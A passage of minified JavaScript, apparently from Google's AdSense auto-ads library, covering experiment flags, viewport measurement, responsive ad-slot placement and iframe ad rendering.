a=Mc(p);a&&-1!=a.location.hash.indexOf("google_logging")&&(kf=!0);p.localStorage.getItem("google_logging")&&(kf=!0)}catch(b){}return kf}function mf(a,b){b=void 0===b?[]:b;var c=!1;p.google_logging_queue||(c=!0,p.google_logging_queue=[]);p.google_logging_queue.push([a,b]);c&&lf()&&(a=jf(Ac(),"/pagead/js/logging_library.js"),Zb(p.document,a))};function nf(a,b,c){this.a=a;this.b=b;this.f=c};function of(a){x(this,a,null,null)}r(of,v);function pf(a){x(this,a,null,null)}r(pf,v);function qf(a){x(this,a,rf,null)}r(qf,v);var rf=[5];function sf(a){try{var b=a.localStorage.getItem("google_ama_settings");return b?new qf(b?JSON.parse(b):null):null}catch(c){return null}};function tf(){};var uf={rectangle:1,horizontal:2,vertical:4};var vf={9:"400",10:"100",13:"0.001",22:"0.01",24:"0.05",28:"0.001",29:"0.01",34:"0.001",60:"0.03",66:"0.1",78:"0.1",79:"1200",82:"3",96:"700",97:"20",98:"0.01",99:"600",100:"100",103:"0.01",111:"0.1",118:"false",120:"0",121:"1000",126:"0.001",128:"false",129:"0.02",135:"0.01",136:"0.02",137:"0.01",142:"1",149:"0",150:"1000",152:"700",153:"20",155:"1",157:"1",158:"100",160:"250",161:"150",162:"0.1",165:"0.02",173:"800",174:"2",176:"0",177:"0.02",179:"100",180:"20",182:"0.1",185:"0.4",189:"400",190:"100",191:"0.04",192:"0",193:"500",194:"90",195:"0",196:"100",197:"false",199:"0",200:"2",201:"true"};var wf=null;function xf(){this.a=vf}function O(a,b){a=parseFloat(a.a[b]);return isNaN(a)?0:a}function yf(a){var b=zf();return jc(b.a[a],!1)}function zf(){wf||(wf=new xf);return wf};var Af=null;function Bf(){if(!Af){for(var a=p,b=a,c=0;a&&a!=a.parent;)if(a=a.parent,c++,Wb(a))b=a;else break;Af=b}return Af};function Cf(){this.a=function(){return[]};this.b=function(){return[]}}function Df(a,b){a.a=cf(Qe,b,function(){});a.b=cf(Re,b,function(){return[]})}va(Cf);var Ef={c:"368226950",g:"368226951"},Ff={c:"368226960",g:"368226961"},Gf={c:"368226470",U:"368226471"},Hf={c:"368226480",U:"368226481"},If={c:"332260030",R:"332260031",P:"332260032"},Jf={c:"332260040",R:"332260041",P:"332260042"},Kf={c:"368226100",g:"368226101"},Lf={c:"368226110",g:"368226111"},Mf={c:"368226500",g:"368226501"},Nf={c:"36998750",g:"36998751"},Of={c:"633794000",B:"633794004"},Pf={c:"633794002",B:"633794005"},Qf={c:"231196899",g:"231196900"},Rf={c:"231196901",g:"231196902"},Sf={c:"21063914",g:"21063915"},Tf={c:"4089040",Da:"4089042"},Uf={o:"20040067",c:"20040068",la:"1337"},Vf={c:"21060548",o:"21060549"},Wf={c:"21060623",o:"21060624"},Xf={c:"22324606",g:"22324607"},Yf={c:"21062271",o:"21062272"},Zf={c:"368226370",g:"368226371"},$f={c:"368226380",g:"368226381"},ag={c:"182982000",g:"182982100"},cg={c:"182982200",g:"182982300"},dg={c:"182983000",g:"182983100"},eg={c:"182983200",g:"182983300"},fg={c:"182984000",g:"182984100"},gg={c:"182984200",g:"182984300"},hg={c:"229739148",g:"229739149"},ig={c:"229739146",g:"229739147"},jg={c:"20040012",g:"20040013"},kg={c:"151527201",T:"151527221",L:"151527222",K:"151527223",I:"151527224",J:"151527225"},P={c:"151527001",T:"151527021",L:"151527022",K:"151527023",I:"151527024",J:"151527025"},lg={c:"151527002",aa:"151527006",ba:"151527007"};function mg(){this.wasPlaTagProcessed=!1;this.wasReactiveAdConfigReceived={};this.adCount={};this.wasReactiveAdVisible={};this.stateForType={};this.reactiveTypeEnabledInAsfe={};this.isReactiveTagFirstOnPage=this.wasReactiveAdConfigHandlerRegistered=this.wasReactiveTagRequestSent=!1;this.reactiveTypeDisabledByPublisher={};this.tagSpecificState={};this.adRegion=null;this.improveCollisionDetection=0;this.messageValidationEnabled=!1}function ng(a){a.google_reactive_ads_global_state||(a.google_reactive_ads_global_state=new mg);return a.google_reactive_ads_global_state};function og(a){a=a.document;var b={};a&&(b="CSS1Compat"==a.compatMode?a.documentElement:a.body);return b||{}}function Q(a){return og(a).clientWidth};function pg(a,b){for(var c=["width","height"],d=0;d<c.length;d++){var e="google_ad_"+c[d];if(!b.hasOwnProperty(e)){var f=F(a[c[d]]);f=null===f?null:Math.round(f);null!=f&&(b[e]=f)}}}function qg(a,b){return!((hc.test(b.google_ad_width)||gc.test(a.style.width))&&(hc.test(b.google_ad_height)||gc.test(a.style.height)))}function rg(a,b){return(a=sg(a,b))?a.y:0}function sg(a,b){try{var c=b.document.documentElement.getBoundingClientRect(),d=a.getBoundingClientRect();return{x:d.left-c.left,y:d.top-c.top}}catch(e){return null}}function tg(a,b){do{var c=$b(a,b);if(c&&"fixed"==c.position)return!1}while(a=a.parentElement);return!0}function ug(a){var b=0,c;for(c in uf)-1!=a.indexOf(c)&&(b|=uf[c]);return b}function vg(a,b,c,d,e){if(Lc(a)!=a)return Mc(a)?3:16;if(!(488>Q(a)))return 4;if(!(a.innerHeight>=a.innerWidth))return 5;var f=Q(a);if(!f||(f-c)/f>d)a=6;else{if(c="true"!=e.google_full_width_responsive)a:{c=Q(a);for(b=b.parentElement;b;b=b.parentElement)if((d=$b(b,a))&&(e=F(d.width))&&!(e>=c)&&"visible"!=d.overflow){c=!0;break a}c=!1}a=c?7:!0}return a}function wg(a,b,c,d){var e=vg(b,c,a,.3,d);if(!0!==e)return e;e=Q(b);a=e-a;a=e&&0<=a?!0:e?-10>a?11:0>a?14:12:10;return"true"==d.google_full_width_responsive||tg(c,b)?a:9}function xg(a,b,c){"rtl"==b?a.style.marginRight=c:a.style.marginLeft=c}function yg(a,b){if(3==b.nodeType)return/\S/.test(b.data);if(1==b.nodeType){if(/^(script|style)$/i.test(b.nodeName))return!1;try{var c=$b(b,a)}catch(d){}return!c||"none"!=c.display&&!("absolute"==c.position&&("hidden"==c.visibility||"collapse"==c.visibility))}return!1}function zg(a,b,c){a=sg(b,a);return"rtl"==c?-a.x:a.x}function Ag(a,b,c,d,e,f){var g=J(a,Kf.g);var h=J(a,Kf.c);if(g||h)f.ovlp=!0;if(g){if(e=b.parentElement)if(e=$b(e,a))b.style.width=Q(a)+"px",e=e.direction,xg(b,e,"0px"),c=zg(a,b,e),xg(b,e,-1*c+"px"),a=zg(a,b,e),0!==a&&a!==c&&xg(b,e,c/(a-c)*c+"px"),b.style.zIndex=30}else if(a=$b(c,a)){g=F(a.paddingLeft)||0;a=a.direction;d=e-d;if(f.google_ad_resize)c=-1*(d+g)+"px";else{for(h=f=0;100>h&&c;h++)f+=c.offsetLeft+c.clientLeft-c.scrollLeft,c=c.offsetParent;c=f+g;c="rtl"==a?-1*(d-c)+"px":-1*c+"px"}xg(b,a,c);b.style.width=e+"px";b.style.zIndex=30}};function R(a,b){this.b=a;this.a=b}l=R.prototype;l.minWidth=function(){return this.b};l.height=function(){return this.a};l.M=function(a){return 300<a&&300<this.a?this.b:Math.min(1200,Math.round(a))};l.ea=function(a){return this.M(a)+"x"+this.height()};l.Z=function(){};function Bg(a,b,c,d){d=void 0===d?function(f){return f}:d;var e;return a.style&&a.style[c]&&d(a.style[c])||(e=$b(a,b))&&e[c]&&d(e[c])||null}function Cg(a){return function(b){return b.minWidth()<=a}}function Dg(a,b,c,d){var e=a&&Eg(c,b),f=Fg(b,d);return function(g){return!(e&&g.height()>=f)}}function Gg(a){return function(b){return b.height()<=a}}function Eg(a,b){return rg(a,b)<og(b).clientHeight-100}function Hg(a,b){a=rg(a,b);b=og(b).clientHeight;return 0==b?null:a/b}function Ig(a,b){var c=Infinity;do{var d=Bg(b,a,"height",F);d&&(c=Math.min(c,d));(d=Bg(b,a,"maxHeight",F))&&(c=Math.min(c,d))}while((b=b.parentElement)&&"HTML"!=b.tagName);return c}function Jg(a,b){var c=Bg(b,a,"height",F);if(c)return c;var d=b.style.height;b.style.height="inherit";c=Bg(b,a,"height",F);b.style.height=d;if(c)return c;c=Infinity;do(d=b.style&&F(b.style.height))&&(c=Math.min(c,d)),(d=Bg(b,a,"maxHeight",F))&&(c=Math.min(c,d));while((b=b.parentElement)&&"HTML"!=b.tagName);return c}function Fg(a,b){var c=a.google_unique_id;return b&&0==("number"===typeof c?c:0)?Math.max(250,2*og(a).clientHeight/3):250};function Kg(a,b){for(var c=[],d=a.length,e=0;e<d;e++)c.push(a[e]);c.forEach(b,void 0)};function Lg(a){if(1!=a.nodeType)var b=!1;else if(b="INS"==a.tagName)a:{b=["adsbygoogle-placeholder"];a=a.className?a.className.split(/\s+/):[];for(var c={},d=0;d<a.length;++d)c[a[d]]=!0;for(d=0;d<b.length;++d)if(!c[b[d]]){b=!1;break a}b=!0}return b};function Mg(a,b){for(var c=0;c<b.length;c++){var d=b[c],e=yb(d.$a);a[e]=d.value}};function Ng(a,b,c,d){this.h=a;this.b=b;this.f=c;this.a=d}function Og(a,b){var c=[];try{c=b.querySelectorAll(a.h)}catch(g){}if(!c.length)return[];b=c;c=b.length;if(0<c){for(var d=Array(c),e=0;e<c;e++)d[e]=b[e];b=d}else b=[];b=Pg(a,b);pa(a.b)&&(c=a.b,0>c&&(c+=b.length),b=0<=c&&c<b.length?[b[c]]:[]);if(pa(a.f)){c=[];for(d=0;d<b.length;d++){e=Qg(b[d]);var f=a.f;0>f&&(f+=e.length);0<=f&&f<e.length&&c.push(e[f])}b=c}return b}Ng.prototype.toString=function(){return JSON.stringify({nativeQuery:this.h,occurrenceIndex:this.b,paragraphIndex:this.f,ignoreMode:this.a})};function Pg(a,b){if(null==a.a)return b;switch(a.a){case 1:return b.slice(1);case 2:return b.slice(0,b.length-1);case 3:return b.slice(1,b.length-1);case 0:return b;default:throw Error("Unknown ignore mode: "+a.a);}}function Qg(a){var b=[];Kg(a.getElementsByTagName("p"),function(c){100<=Rg(c)&&b.push(c)});return b}function Rg(a){if(3==a.nodeType)return a.length;if(1!=a.nodeType||"SCRIPT"==a.tagName)return 0;var b=0;Kg(a.childNodes,function(c){b+=Rg(c)});return b}function Sg(a){return 0==a.length||isNaN(a[0])?a:"\\"+(30+parseInt(a[0],10))+" "+a.substring(1)};function Tg(a){if(!a)return null;var b=y(a,7);if(y(a,1)||a.X()||0<y(a,4).length){var c=a.X(),d=y(a,1),e=y(a,4);b=y(a,2);var f=y(a,5);a=Ug(y(a,6));var g="";d&&(g+=d);c&&(g+="#"+Sg(c));if(e)for(c=0;c<e.length;c++)g+="."+Sg(e[c]);b=(e=g)?new Ng(e,b,f,a):null}else b=b?new Ng(b,y(a,2),y(a,5),Ug(y(a,6))):null;return b}var Vg={1:1,2:2,3:3,0:0};function Ug(a){return null!=a?Vg[a]:a}var Wg={1:0,2:1,3:2,4:3};function Xg(){this.a={};this.b={}}Xg.prototype.add=function(a){this.a[a]=!0;this.b[a]=a};Xg.prototype.contains=function(a){return!!this.a[a]};function Yg(){this.a={};this.b={}}Yg.prototype.set=function(a,b){this.a[a]=b;this.b[a]=a};Yg.prototype.get=function(a,b){return void 0!==this.a[a]?this.a[a]:b};function Zg(){this.a=new Yg}Zg.prototype.set=function(a,b){var c=this.a.get(a);c||(c=new Xg,this.a.set(a,c));c.add(b)};function $g(a,b){function c(){d.push({anchor:e.anchor,position:e.position});return e.anchor==b.anchor&&e.position==b.position}for(var d=[],e=a;e;){switch(e.position){case 1:if(c())return d;e.position=2;case 2:if(c())return d;if(e.anchor.firstChild){e={anchor:e.anchor.firstChild,position:1};continue}else e.position=3;case 3:if(c())return d;e.position=4;case 4:if(c())return d}for(;e&&!e.anchor.nextSibling&&e.anchor.parentNode!=e.anchor.ownerDocument.body;){e={anchor:e.anchor.parentNode,position:3};if(c())return d;e.position=4;if(c())return d}e&&e.anchor.nextSibling?e={anchor:e.anchor.nextSibling,position:1}:e=null}return d};function ah(a,b){this.b=a;this.a=b}function bh(a,b){var c=new Zg,d=new Xg;b.forEach(function(e){if(B(e,Xc,1)){e=B(e,Xc,1);if(B(e,Uc,1)&&B(B(e,Uc,1),Sc,1)&&B(e,Uc,2)&&B(B(e,Uc,2),Sc,1)){var f=ch(a,B(B(e,Uc,1),Sc,1)),g=ch(a,B(B(e,Uc,2),Sc,1));if(f&&g)for(f=ba($g({anchor:f,position:y(B(e,Uc,1),2)},{anchor:g,position:y(B(e,Uc,2),2)})),g=f.next();!g.done;g=f.next())g=g.value,c.set(Aa(g.anchor),g.position)}B(e,Uc,3)&&B(B(e,Uc,3),Sc,1)&&(f=ch(a,B(B(e,Uc,3),Sc,1)))&&c.set(Aa(f),y(B(e,Uc,3),2))}else B(e,Yc,2)?dh(a,B(e,Yc,2),c):B(e,Zc,3)&&eh(a,B(e,Zc,3),d)});return new ah(c,d)}function dh(a,b,c){B(b,Sc,1)&&(a=fh(a,B(b,Sc,1)))&&a.forEach(function(d){d=Aa(d);c.set(d,1);c.set(d,4);c.set(d,2);c.set(d,3)})}function eh(a,b,c){B(b,Sc,1)&&(a=fh(a,B(b,Sc,1)))&&a.forEach(function(d){c.add(Aa(d))})}function ch(a,b){return(a=fh(a,b))&&0<a.length?a[0]:null}function fh(a,b){return(b=Tg(b))?Og(b,a):null};function gh(a,b){var c=b.b-301,d=b.a+b.f+301,e=b.b+301,f=b.a-301;return!La(a,function(g){return g.left<d&&f<g.right&&g.top<e&&c<g.bottom})};function hh(a,b){if(!a)return!1;a=$b(a,b);if(!a)return!1;a=a.cssFloat||a.styleFloat;return"left"==a||"right"==a}function ih(a){for(a=a.previousSibling;a&&1!=a.nodeType;)a=a.previousSibling;return a?a:null}function jh(a){return!!a.nextSibling||!!a.parentNode&&jh(a.parentNode)};function kh(a,b){return a&&null!=y(a,4)&&b[y(B(a,ad,4),2)]?!1:!0}function lh(a){var b={};a&&y(a,6).forEach(function(c){b[c]=!0});return b}function mh(a,b,c,d){this.a=p;this.$=a;this.f=b;this.i=d||null;this.s=(this.w=c)?bh(p.document,C(c,Vc,5)):bh(p.document,[]);this.b=0;this.h=!1}function nh(a,b){if(a.h)return!0;a.h=!0;var c=C(a.f,bd,1);a.b=0;var d=lh(a.w);if(B(a.f,ld,15)&&Gb(B(a.f,ld,15),12)){var e=sf(a.a);e=null===e?null:C(e,pf,5);if(null!=e){var f=sf(a.a);f=null!==f&&null!=y(f,3)&&null!==Eb(f,3)?Eb(f,3):.3;var g=sf(a.a);g=null!==g&&null!=y(g,4)?Eb(g,4):1;f-=g;g=[];for(var h=0;h<e.length&&.05<=f&&4>(oh(a).numAutoAdsPlaced||0);h++){var k=y(e[h],1);if(null==k)break;var m=c[k],n=B(e[h],of,2);null!=n&&null!=Eb(n,1)&&null!=Eb(n,2)&&null!=Eb(n,3)&&(n=new nf(Eb(n,1),Eb(n,2),Eb(n,3)),gh(g,n)&&(k=ph(a,m,k,b,d),null!=k&&null!=k.V&&(k=k.V.getBoundingClientRect(),g.push(k),m=a.a,f-=k.width*k.height/(og(m).clientHeight*Q(m)))))}}return!0}e=sf(a.a);if(null!==e&&Gb(e,2))return oh(a).eatf=!0,mf(7,[!0,0,!1]),!0;for(e=0;e<c.length;e++)if(ph(a,c[e],e,b,d))return!0;mf(7,[!1,a.b,!1]);return!1}function ph(a,b,c,d,e){if(1!==y(b,8)||!kh(b,e))return null;var f=B(b,ad,4);if(f&&2==y(f,1)){a.b++;if(b=qh(a,b,d,e))d=oh(a),d.placement=c,d.numAutoAdsPlaced||(d.numAutoAdsPlaced=0),d.numAutoAdsPlaced++,mf(7,[!1,a.b,!0]);return b}return null}function qh(a,b,c,d){if(!kh(b,d)||1!=y(b,8))return null;d=B(b,Sc,1);if(!d)return null;d=Tg(d);if(!d)return null;d=Og(d,a.a.document);if(0==d.length)return null;d=d[0];var e=y(b,2);e=Wg[e];e=void 0!==e?e:null;var f;if(!(f=null==e)){a:{f=a.a;switch(e){case 0:f=hh(ih(d),f);break a;case 3:f=hh(d,f);break a;case 2:var g=d.lastChild;f=hh(g?1==g.nodeType?g:ih(g):null,f);break a}f=!1}if(c=!f&&!(!c&&2==e&&!jh(d)))c=1==e||2==e?d:d.parentNode,c=!(c&&!Lg(c)&&0>=c.offsetWidth);f=!c}if(!(c=f)){c=a.s;f=y(b,2);g=Aa(d);g=c.b.a.get(g);if(!(g=g?g.contains(f):!1))a:{if(c.a.contains(Aa(d)))switch(f){case 2:case 3:g=!0;break a;default:g=!1;break a}for(f=d.parentElement;f;){if(c.a.contains(Aa(f))){g=!0;break a}f=f.parentElement}g=!1}c=g}if(c)return null;f=B(b,$c,3);c={};f&&(c.za=y(f,1),c.na=y(f,2),c.Ha=!!Fb(f,3));f=B(b,ad,4)&&y(B(b,ad,4),2)?y(B(b,ad,4),2):null;f=ie(f);b=null==y(b,12)?null:y(b,12);b=he(a.i,f,null==b?null:new ge(null,{google_ml_rank:b}));f=a.a;a=a.$;var h=f.document;g=Rb((new Sb(h)).a,"DIV");var k=g.style;k.textAlign="center";k.width="100%";k.height="auto";k.clear=c.Ha?"both":"none";c.Pa&&Mg(k,c.Pa);h=Rb((new Sb(h)).a,"INS");k=h.style;k.display="block";k.margin="auto";k.backgroundColor="transparent";c.za&&(k.marginTop=c.za);c.na&&(k.marginBottom=c.na);c.Fa&&Mg(k,c.Fa);g.appendChild(h);c={da:g,V:h};c.V.setAttribute("data-ad-format","auto");g=[];if(h=b&&b.oa)c.da.className=h.join(" ");h=c.V;h.className="adsbygoogle";h.setAttribute("data-ad-client",a);g.length&&h.setAttribute("data-ad-channel",g.join("+"));a:{try{var m=c.da;switch(e){case 0:d.parentNode&&d.parentNode.insertBefore(m,d);break;case 3:var n=d.parentNode;if(n){var u=d.nextSibling;if(u&&u.parentNode!=n)for(;u&&8==u.nodeType;)u=u.nextSibling;n.insertBefore(m,u)}break;case 1:d.insertBefore(m,d.firstChild);break;case 2:d.appendChild(m)}Lg(d)&&(d.setAttribute("data-init-display",d.style.display),d.style.display="block");b:{var w=c.V;w.setAttribute("data-adsbygoogle-status","reserved");w.className+=" adsbygoogle-noablate";m={element:w};var z=b&&b.ua;if(w.hasAttribute("data-pub-vars")){try{z=JSON.parse(w.getAttribute("data-pub-vars"))}catch(H){break b}w.removeAttribute("data-pub-vars")}z&&(m.params=z);(f.adsbygoogle=f.adsbygoogle||[]).push(m)}}catch(H){(w=c.da)&&w.parentNode&&(z=w.parentNode,z.removeChild(w),Lg(z)&&(z.style.display=z.getAttribute("data-init-display")||"none"));w=!1;break a}w=!0}return w?c:null}function oh(a){return a.a.google_ama_state=a.a.google_ama_state||{}};function rh(){this.b=new sh(this);this.a=0}function th(a){if(0!=a.a)throw Error("Already resolved/rejected.");}function sh(a){this.a=a}function uh(a){switch(a.a.a){case 0:break;case 1:a.b&&a.b(a.a.h);break;case 2:a.f&&a.f(a.a.f);break;default:throw Error("Unhandled deferred state.");}};function vh(a,b){this.exception=b}function wh(a,b){this.f=p;this.a=a;this.b=b}wh.prototype.start=function(){this.h()};wh.prototype.h=function(){try{switch(this.f.document.readyState){case "complete":case "interactive":nh(this.a,!0);xh(this);break;default:nh(this.a,!1)?xh(this):this.f.setTimeout(Fa(this.h,this),100)}}catch(a){xh(this,a)}};function xh(a,b){try{var c=a.b,d=new vh(new tf(oh(a.a).numAutoAdsPlaced||0),b);th(c);c.a=1;c.h=d;uh(c.b)}catch(e){a=a.b,b=e,th(a),a.a=2,a.f=b,uh(a.b)}};function yh(a){me(a,{atf:1})}function zh(a,b){(a.google_ama_state=a.google_ama_state||{}).exception=b;me(a,{atf:0})};function Ah(){this.debugCard=null;this.debugCardRequested=!1};function Bh(a,b){if(!a)return!1;a=a.hash;if(!a||!a.indexOf)return!1;if(-1!=a.indexOf(b))return!0;b=Ch(b);return"go"!=b&&-1!=a.indexOf(b)?!0:!1}function Ch(a){var b="";Dc(a.split("_"),function(c){b+=c.substr(0,2)});return b};function Dh(a,b,c){var d="script";d=void 0===d?"":d;var e=a.createElement("link");try{e.rel="preload";if(eb("preload","stylesheet"))var f=Xa(b).toString();else{if(b instanceof Va)var g=Xa(b).toString();else{if(b instanceof hb)var h=jb(b);else{if(b instanceof hb)var k=b;else b="object"==typeof b&&b.f?b.b():String(b),kb.test(b)||(b="about:invalid#zClosurez"),k=lb(b);h=jb(k)}g=h}f=g}e.href=f}catch(m){return}d&&(e.as=d);c&&e.setAttribute("nonce",c);if(a=a.getElementsByTagName("head")[0])try{a.appendChild(e)}catch(m){}};function Eh(a){var b={},c={};return c.enable_page_level_ads=(b.pltais=!0,b),c.google_ad_client=a,c};function Fh(a){if(!a)return"";(a=a.toLowerCase())&&"ca-"!=a.substring(0,3)&&(a="ca-"+a);return a};function Gh(a,b){function c(d){try{var e=new Kb(d);return Ma(C(e,Mb,2),function(f){return 1==y(f,1)})}catch(f){return null}}b=void 0===b?"":b;a=Mc(a)||a;a=Hh(a);return b?(b=Fh(String(b)),a[b]?c(a[b]):null):Ma(Ka(Ta(a),c),function(d){return null!=d})}function Ih(a,b,c){function d(e){if(!e)return!1;e=new Kb(e);return y(e,3)&&Oa(y(e,3),b)}c=void 0===c?"":c;a=Mc(a)||a;if(Jh(a,b))return!0;a=Hh(a);return c?(c=Fh(String(c)),d(a[c])):Sa(a,d)}function Jh(a,b){a=(a=(a=a.location&&a.location.hash)&&a.match(/forced_clientside_labs=([\d,]+)/))&&a[1];return!!a&&Oa(a.split(","),b.toString())}function Hh(a){try{return mc({},JSON.parse(a.localStorage.getItem("google_adsense_settings")))}catch(b){return{}}};function Kh(a){var b=Ih(p,12,a.google_ad_client);a="google_ad_host"in a;var c=J(p,Ef.g),d=Bh(p.location,"google_ads_preview");return b&&!a&&c||d}function Lh(a){if(p.google_apltlad||Lc(p)!=p||!a.google_ad_client)return null;var b=Kh(a),c=!J(p,Gf.U);if(!b&&!c)return null;p.google_apltlad=!0;var d=Eh(a.google_ad_client),e=d.enable_page_level_ads;ec(a,function(f,g){Rc[g]&&"google_ad_client"!=g&&(e[g]=f)});b?e.google_ad_channel="AutoInsertAutoAdCode":c&&(e.google_pgb_reactive=7,"google_ad_section"in a||"google_ad_region"in a)&&(e.google_ad_section=a.google_ad_section||a.google_ad_region);return d}function Mh(a){return za(a.enable_page_level_ads)&&7==a.enable_page_level_ads.google_pgb_reactive};function ae(a){try{var b=I(p).eids||[];null!=b&&0<b.length&&(a.eid=b.join(","))}catch(c){}}function $d(a){a.shv=wc()}Vd.h=!xc;function Nh(a,b){return rg(b,a)+Bg(b,a,"height",F)};var Oh=new K(200,399,""),Ph=new K(400,499,""),Qh=new K(600,699,""),Rh=new K(700,799,""),Sh=new K(800,899,""),Th=new K(1,399,"3"),Uh=new K(0,999,"5"),Vh=new K(400,499,"6"),Wh=new K(500,599,""),Xh=new K(0,999,"7"),Yh=new K(0,999,"8");function Zh(a){a=void 0===a?p:a;return a.ggeac||(a.ggeac={})};function $h(){var a={};this[3]=(a[8]=function(b){return!!ta(b)},a[9]=function(b){b=ta(b);var c;if(c="function"==wa(b))b=b&&b.toString&&b.toString(),c=q(b)&&eb(b,"[native code]");return c},a[10]=function(){return window==window.top},a[16]=function(){return qc()},a[22]=function(){return pc()},a);a={};this[4]=(a[5]=function(b){b=Dd(window,void 0===b?"":b);return null!=b?b:void 0},a[6]=function(b){b=ta(b);return pa(b)?b:void 0},a);a={};this[5]=(a[2]=function(){return window.location.href},a[3]=function(){try{return window.top.location.hash}catch(b){return""}},a[4]=function(b){b=ta(b);return q(b)?b:void 0},a)}va($h);function ai(a){x(this,a,bi,null)}r(ai,v);var bi=[2];ai.prototype.X=function(){return A(this,1,0)};ai.prototype.W=function(){return A(this,7,0)};function ci(a){x(this,a,di,null)}r(ci,v);var di=[2];ci.prototype.W=function(){return A(this,5,0)};function ei(a){x(this,a,fi,null)}r(ei,v);function gi(a){x(this,a,hi,null)}r(gi,v);var fi=[1,2],hi=[2];gi.prototype.W=function(){return A(this,1,0)};var ii=[12,13];function ji(a,b){var c=this,d=void 0===b?{}:b;b=void 0===d.Ja?!1:d.Ja;var e=void 0===d.Oa?{}:d.Oa;d=void 0===d.Xa?[]:d.Xa;this.a=a;this.i=b;this.f=e;this.h=d;this.b={};(a=Fd())&&Ia(a.split(",")||[],function(f){(f=parseInt(f,10))&&(c.b[f]=!0)})}function ki(a,b){var c=[],d=li(a.a,b);d.length&&(9!==b&&(a.a=mi(a.a,b)),Ia(d,function(e){if(e=ni(a,e)){var f=e.X();c.push(f);a.h.push(f);(e=C(e,ze,2))&&Ne(e)}}));return c}function oi(a,b){a.a.push.apply(a.a,ca(Ja(Ka(b,function(c){return new gi(c)}),function(c){return!Oa(ii,c.W())})))}function ni(a,b){var c=De.j().a;if(!we(B(b,pe,3),c))return null;var d=C(b,ai,2),e=c?Ja(d,function(g){return we(B(g,pe,3),c)}):d,f=e.length;if(!f)return null;d=A(b,4,0);b=f*A(b,1,0);if(!d)return pi(a,e,b/1E3);f=null!=a.f[d]?a.f[d]:1E3;if(0>=f)return null;e=pi(a,e,b/f);a.f[d]=e?0:f-b;return e}function pi(a,b,c){var d=a.b,e=Ma(b,function(f){return!!d[f.X()]});return e?e:a.i?null:ac(b,c,!1)}function qi(a,b){N(Pe,function(c){a.b[c]=!0},b);N(Qe,function(c){return ki(a,c)},b);N(Re,function(){return a.h},b);N($e,function(c){return oi(a,c)},b)}function li(a,b){return(a=Ma(a,function(c){return c.W()==b}))&&C(a,ci,2)||[]}function mi(a,b){return Ja(a,function(c){return c.W()!=b})};function ri(){this.a=function(){}}va(ri);function si(){var a=$h.j();ri.j().a(a)};function ti(a,b){var c=void 0===c?Zh():c;c.hasOwnProperty("init-done")?(cf($e,c)(Ka(C(a,gi,2),function(d){return Jb(d)})),cf(af,c)(Ka(C(a,ze,1),function(d){return Jb(d)})),ui(c)):(qi(new ji(C(a,gi,2),b),c),df(c),ef(c),ff(c),ui(c),Ne(C(a,ze,1)),si())}function ui(a){var b=a=void 0===a?Zh():a;Df(Cf.j(),b);b=a;gf.j().a=cf(Te,b);ri.j().a=cf(bf,a)};function S(a,b){b&&a.push(b)}function vi(a,b){for(var c=[],d=1;d<arguments.length;++d)c[d-1]=arguments[d];d=Mc(a)||a;d=(d=(d=d.location&&d.location.hash)&&(d.match(/google_plle=([\d,]+)/)||d.match(/deid=([\d,]+)/)))&&d[1];return!!d&&La(c,Ga(eb,d))}function wi(a,b,c){for(var d=0;d<c.length;d++)if(vi(a,c[d]))return c[d];return ac(c,b)}function T(a,b,c,d,e,f){f=void 0===f?1:f;for(var g=0;g<e.length;g++)if(vi(a,e[g]))return e[g];f=void 0===f?1:f;0>=d?c=null:(g=new Cd(c,c+d-1),(d=d%f||d/f%e.length)||(d=b.b,d=!(d.start<=g.start&&d.a>=g.a)),d?c=null:(a=Dd(a,b.a),c=null!==a&&g.start<=a&&g.a>=a?e[Math.floor((a-c)/f)%e.length]:null));return c};function xi(a,b,c){if(Wb(a.document.getElementById(b).contentWindow))a=a.document.getElementById(b).contentWindow,b=a.document,b.body&&b.body.firstChild||(/Firefox/.test(navigator.userAgent)?b.open("text/html","replace"):b.open(),a.google_async_iframe_close=!0,b.write(c));else{a=a.document.getElementById(b).contentWindow;c=String(c);b=['"'];for(var d=0;d<c.length;d++){var e=c.charAt(d),f=e.charCodeAt(0),g=d+1,h;if(!(h=wb[e])){if(!(31<f&&127>f))if(f=e,f in xb)e=xb[f];else if(f in wb)e=xb[f]=wb[f];else{h=f.charCodeAt(0);if(31<h&&127>h)e=f;else{if(256>h){if(e="\\x",16>h||256<h)e+="0"}else e="\\u",4096>h&&(e+="0");e+=h.toString(16).toUpperCase()}e=xb[f]=e}h=e}b[g]=h}b.push('"');a.location.replace("javascript:"+b.join(""))}};var yi=null;function U(a,b,c,d){d=void 0===d?!1:d;R.call(this,a,b);this.Y=c;this.Ma=d}ka(U,R);U.prototype.ha=function(){return this.Y};U.prototype.Z=function(a,b,c,d){if(!c.google_ad_resize){d.style.height=this.height()+"px";b=J(a,Of.c)||"ca-pub-9118350542306317"===c.google_ad_client;d=yf(197)?!J(a,Of.c):J(a,Of.B);var e=J(a,P.c),f=J(a,P.T)||J(a,P.L)||J(a,P.K)||J(a,P.I)||J(a,P.J);if(J(a,Of.c)||J(a,Of.B)||e||f)c.ovlp=!0;b?c.rpe=!1:d&&(c.rpe=!0)}};function zi(a){return function(b){return!!(b.Y&a)}};var Ai=zb("script");function Bi(a,b,c,d,e,f,g,h,k,m,n,u,w,z){this.sa=a;this.a=b;this.Y=void 0===c?null:c;this.f=void 0===d?null:d;this.ja=void 0===e?null:e;this.b=void 0===f?null:f;this.h=void 0===g?null:g;this.w=void 0===h?!1:h;this.$=void 0===k?!1:k;this.Aa=void 0===m?null:m;this.Ba=void 0===n?null:n;this.i=void 0===u?null:u;this.s=void 0===w?null:w;this.Ca=void 0===z?null:z;this.ka=this.xa=this.ta=null}function Ci(a,b,c){null!=a.Y&&(c.google_responsive_formats=a.Y);null!=a.ja&&(c.google_safe_for_responsive_override=a.ja);null!=a.b&&(!0===a.b?c.google_full_width_responsive_allowed=!0:(c.google_full_width_responsive_allowed=!1,c.gfwrnwer=a.b));null!=a.h&&!0!==a.h&&(c.gfwrnher=a.h);a.w&&(c.google_bfa=a.w);a.$&&(c.ebfa=a.$);var d=a.s||c.google_ad_width;null!=d&&(c.google_resizing_width=d);d=a.i||c.google_ad_height;null!=d&&(c.google_resizing_height=d);d=a.a.M(b);var 